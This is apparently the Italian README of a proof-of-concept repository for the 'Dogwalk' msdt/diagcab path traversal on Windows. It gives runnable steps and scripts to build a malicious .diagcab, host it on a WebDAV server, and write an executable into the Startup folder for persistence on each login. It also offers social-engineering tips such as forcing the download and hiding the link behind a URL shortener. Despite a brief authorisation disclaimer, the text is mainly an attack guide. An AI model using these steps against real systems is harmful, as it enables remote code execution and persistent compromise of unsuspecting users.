
🐾Dogwalk PoC (usando file diagcab per ottenere RCE su Windows)
🚨 Disclaimer 🚨
La PoC consente a un attaccante di ottenere Remote Code Injection su un dispositivo Windows della vittima.
L'obiettivo di questo repo è rendere una PoC ancora più utilizzabile del <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>repo iniziale.
NON USARLA SENZA PREVIA AUTORIZZAZIONE!
Considerando i danni causati e la semplicità di sfruttamento,spero che Microsoft la sistemi
Aggiornamento luglio 2022: Microsoft non ha ancora corretto la vulnerabilità in msdt ma Microsoft Defender è in grado di individuarla
Concetto fondamentale: vulnerabilità di path traversal nella tecnologia Diagcab di Microsoft (msdt) che potrebbe portare all'esecuzione di codice remota.
Puoi trovare l'advisory completo nel post del blog
La vulnerabilità è stata segnalata da 2 anni (da @irsl) e non ha ancora alcuna correzione!
La Proof-of-Concept configura un server webdav che ospita un file .diagcab malevolo che eseguirà un path traversal per scrivere un eseguibile malevolo in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Scrivere un eseguibile in questa cartella lo eseguirà ogni volta che l'utente avvia la macchina Windows; questa tecnica è chiamata Boot Logon Autostart Execution.
Quindi, in pratica, ciò che ci serve è:
.diagcab malevolo.diagcab(💡 usa l'header di risposta Content-type: application/octet-stream per fare sì che il browser scarichi automaticamente il file quando si visita l'URL)
Se sei troppo pigro (o hai fretta) per procedere passo dopo passo:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
Altrimenti ↓↓
.diagcabI file .diagcfg sono semplici file XML che contengono riferimenti a uno o più pacchetti di diagnostica e forniscono meta-informazioni su di essi.
Vengono impacchettati in archivi cabinet di Microsoft e salvati con estensione .diagcab.
Per prima cosa costruisci custom.diagcfg:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
E costruisci il file hotfix895214.diagcab:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
Infine, spostalo nella directory ./webdav/diagcab-webdav-poc/config
Metti l'eseguibile che vuoi trasferire sulla macchina vittima nella directory ./webdav/malicious... (Qui usiamo la classica calc.exe)
...E avvia il server:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
Il file .diagcab malevolo è disponibile all'indirizzo https://[WEBDAV_URL]/config/hotfix895214.diagcab. Ora devi indurre una vittima a fare clic su questo link.
(💡puoi usare un accorciatore di URL per renderlo meno sospetto)
🐾🐾
